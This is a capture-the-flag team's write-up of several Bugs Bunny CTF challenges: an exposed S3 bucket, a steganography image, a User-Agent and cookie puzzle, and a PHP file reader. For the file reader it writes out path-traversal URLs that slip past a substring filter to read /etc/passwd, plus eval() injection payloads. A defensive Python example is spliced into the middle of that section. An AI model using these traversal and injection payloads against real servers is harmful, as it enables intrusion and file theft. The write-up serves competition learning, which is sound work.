Here are some of the write-ups for the Bugs Bunny Capture The Flag challenges. As most of the services are down, I will be adding write-ups one after another for the services that are currently up. We participated as team dcua, a group of awesome people giving their best effort on the challenges.
Web 350
Solver(s): Aaditya Purani
There was one link given in the question:
http://www.chouaibhm.me/
Opening the website, it is just a one-page site. We cannot really do much here. Viewing the source code reveals a fake flag:
<!-- Bugs_Bunny{dont_be_stupid} -->
Now, intuitively, I started to search for special directories (apart from js, css, img etc.) and files. I noticed that the following two returned a 200 status, whereas everything else displayed 'NoSuchKey':
http://www.chouaibhm.me/META-INF/
http://www.chouaibhm.me/WEB-INF/
There was no directory listing, but by then it was trivial to see this as an S3 bucket (NoSuchKey is the error S3 returns for a missing object). Hence, I fired up my terminal and used the aws-cli:
$ aws s3 ls s3://www.chouaibhm.me/
                           PRE QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/
                           PRE css/
                           PRE img/
                           PRE js/
                           PRE sass/
                           PRE vendor/
2017-07-20 03:04:47      52157 index.html
Nice, we can read the S3 bucket. Using the same command to go inside the first directory, we see there is a flag.txt:
$ curl http://www.chouaibhm.me/QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30/flag.txt
you are so close don't be stupid tho xD Bugs_Bunny{I_am_JOking_lol}
That is also not the flag. But as we can notice, the directory name is base64:
$ echo -e "QnVnc19CdW5ueXtZMHVfNHJlX0MwMDFfdDBkYXlfRHVkM30=" | base64 -d
Bugs_Bunny{Y0u_4re_C001_t0day_Dud3}
That's it. Pretty simple.
Web 150 (MindReader)
Solver(s): Aaditya Purani & solarwind
URL: http://52.53.151.123/web/web100/
Note that we were the 2nd team to solve this challenge after it was launched (~30 minutes). When we solved it, it was running on the above-mentioned URL. Hence, our write-up specifically shows how we solved it for that URL.
Visiting the URL gives us the page below:
We can see that there is a placeholder which says file/readme.txt. So, we think evil here and start by inputting /etc/passwd. This gives us a custom error as a troll, so it's not that easy. Hence, we input file/readme.txt and we can see it does read the file. Cool!
I tried using the php:// wrapper, like PHP://filter/convert.base64-encode/resource= . Such techniques are mentioned here. It works, but for file/readme.txt specifically. Our goal is to break out of it. I noticed that anything except file/readme.txt threw the custom error. Time to fiddle!
This is basically how traversal works:
$ ls dir1/                      # dir1 contains file1.txt
file1.txt
$ cat dir1/file1.txt            # cat file1.txt to stdout
$ cat dir1/../dir1/file1.txt    # works the same as above
So what do you notice? It's not confusing at all. Here is the breakdown:
$ cat dir1/../dir1/file1.txt
      ^    ^
      |    |______ /../ moves one directory back, so you reach where you were before
      |___________ Same dir
Now that you know the basics, you can fetch the file like this:
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt
This works. Hence, traversal is possible between directories. But there is a filter, as already mentioned; otherwise I could have traversed to /etc/passwd before. So, let's defeat it.
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.txt.blah (Blank Page)
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/roastme.txt (Custom Error)
http://52.53.151.123/web/web100/readMinder.php?file=file/../file/readme.omg (Blank Page)
Anything containing readme worked. In order to traverse, the end of your path should be the file you want to read. In my case, I don't want to read junk like readme.* but am particularly interested in juicy files. How about adding readme at the beginning :p
http://52.53.151.123/web/web100/readMinder.php?file=readme/../file/readme.txt
Throws a custom error. Nice, they hate readme as a prefix. After padding the prefix with xxx and adding a suffix, my working payload was
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../file/readme.txt
Yikes, broke out of the filter in no time. I could access /etc/passwd:
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../../../../../../etc/passwd
Now we can also read the source of readMinder.php, thanks to solarwind:
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../readMinder.php
http://52.53.151.123/web/web100/readMinder.php?file=xxxreadmex/../flag/flag.txt
flag.txt was a troll too. I started reading the source to escalate this:
exit("file name too long dude :v !");
$filename = basename($file);
if (!strpos($file, "readme")) exit("Not The good Way bro 😉 !");
echo " ";
readfile($file);
echo " ";
eval("fwrite(fopen('flag/flag.txt','a'),'$filename');");
?>
Spot the bug! We control $file, hence $filename too. The basename() function returns the filename from a path, and that $filename goes into eval(). If you are a security guy, you won't need an introduction to eval(). So, in this case we control what goes into eval, and we can break out of it:
eval("fwrite(fopen('flag/flag.txt','a'),'');echo('aaditya');"); ?>
Payload: ');echo('aaditya
Now we own the plot from here. Below is the vector by solarwind, using glob() to find files:
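A defender's view of the two bugs above, as an added example in Python (not part of the original write-up or of the challenge code): weak_check models the page's strpos filter, which also explains why readme as a prefix was rejected (strpos returns offset 0 and PHP treats 0 as false), safe_resolve shows the canonical-path containment check a file reader should use instead, and log_access records the basename as data rather than interpolating it into code the way the eval() line does. The function names, the throwaway directory layout and the sample inputs are all constructed for this example.

```python
import os
import tempfile
from typing import Optional

# Substring the page's filter looked for in the requested path.
REQUIRED_TOKEN = "readme"


def weak_check(user_path: str) -> bool:
    """Model of the page's filter: if (!strpos($file, "readme")) exit(...).

    PHP's strpos() returns the match offset and PHP treats 0 as false, so a
    path that *starts* with "readme" is rejected while a path with "readme"
    anywhere after position 0 (e.g. "xxxreadmex/../../etc/passwd") passes.
    Python's str.find() returns -1 when absent, so both cases are spelled out.
    """
    pos = user_path.find(REQUIRED_TOKEN)
    return pos > 0  # -1 (absent) and 0 (prefix) both fail, exactly as in PHP


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Hardened check: resolve the path and require it to stay under base_dir.

    The decision is made on where the path *resolves*, not on what the string
    looks like, so "../" sequences and symlinks cannot escape the web root.
    Returns the canonical path, or None when the request is rejected.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath() rather than startswith(): /srv/files must not accept
    # /srv/files2/x, which a plain prefix comparison would.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def read_under(base_dir: str, user_path: str) -> Optional[str]:
    """Serve a file only if safe_resolve() accepts it and it is a regular file."""
    target = safe_resolve(base_dir, user_path)
    if target is None or not os.path.isfile(target):
        return None
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def log_access(log_path: str, user_path: str) -> str:
    """Append the requested basename to a log as plain data.

    The page's PHP interpolated basename($file) into a string handed to eval(),
    so a quote in the filename ended the string literal and the rest ran as
    code.  Written as data, a name such as  x');echo('y  is logged verbatim.
    """
    name = os.path.basename(user_path)
    with open(log_path, "a", encoding="utf-8") as fh:
        fh.write(name + "\n")
    return name


def demo() -> dict:
    """Run constructed requests against a throwaway web root.

    Returns {case: (weak_check result, content returned by the hardened reader)}
    plus a "logged" entry showing what log_access wrote.
    """
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "web")
        os.makedirs(os.path.join(webroot, "file"))
        with open(os.path.join(webroot, "file", "readme.txt"), "w", encoding="utf-8") as fh:
            fh.write("hello")                        # constructed in-scope file
        with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as fh:
            fh.write("outside the web root")          # constructed out-of-scope file

        cases = {
            "legit":  "file/readme.txt",              # the intended request
            "prefix": "readme/../file/readme.txt",    # rejected by the page's filter (offset 0)
            "escape": "xxxreadmex/../../secret.txt",  # passes the substring filter, leaves webroot
        }
        results = {name: (weak_check(p), read_under(webroot, p)) for name, p in cases.items()}

        log_path = os.path.join(root, "access.log")
        logged = log_access(log_path, "x');echo('y")
        with open(log_path, encoding="utf-8") as fh:
            results["logged"] = (logged, fh.read())
        return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:7s} -> {outcome}")
```

Running it shows the contrast directly: the "escape" request satisfies the substring filter yet the hardened reader returns None, while the "prefix" request, which the original filter rejected for the wrong reason, resolves inside the web root and is served. The logged entry is the quoted name as-is, because nothing ever treats it as code.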
http://52.53.151.123/web/web100/readMinder.php?file=xreadme.txt');var_dump(glob('*'));die('END
and
view-source: http://52.53.151.123/web/web100/key/key.txt
Bugs_bunny{R3adf1le_15_n0t_G00d}
Steg100
We were given an image, which I tried to refine with the GIMP editor. Here are the results. We can notice the flag now (it's not very sharp in the image): BUGS_BUNNY{Odd_2nd_3V3N_2r3nt_funNy}
Web 30
URL: http://52.53.151.123/web/web30.php
Visiting the page shows that your User-Agent is not "Bugs_Bunny Browser". We can tamper with the User-Agent by using the 'User-Agent Switcher' plugin and creating an agent named Bugs_Bunny Browser.
After refreshing, we reach the next page, which says (1/2) This is your key maybe you need twice "Hashkiller". We can open Burp Suite and start intercepting the request. There is a cookie:
Cookie: flag=zn8XhqnlBRBetevoFcSQAw0OMVH6Kwj23svbneF1+5gDfBdn9osZBfB06cTub4ARg3OTTjsBIG7x
It's a custom encryption. As the hint suggests Hashkiller, we proceed to https://hashkiller.co.uk/text-encryption.aspx
and decrypt the ciphertext with the key 'Hashkiller', which gives us the flag:
Bugs_Bunny{hashkiller_has_a_custom_encryption_algorithm}
Conclusion:
We finished 1st at the end of the competition. Credits and Shouts to the Team.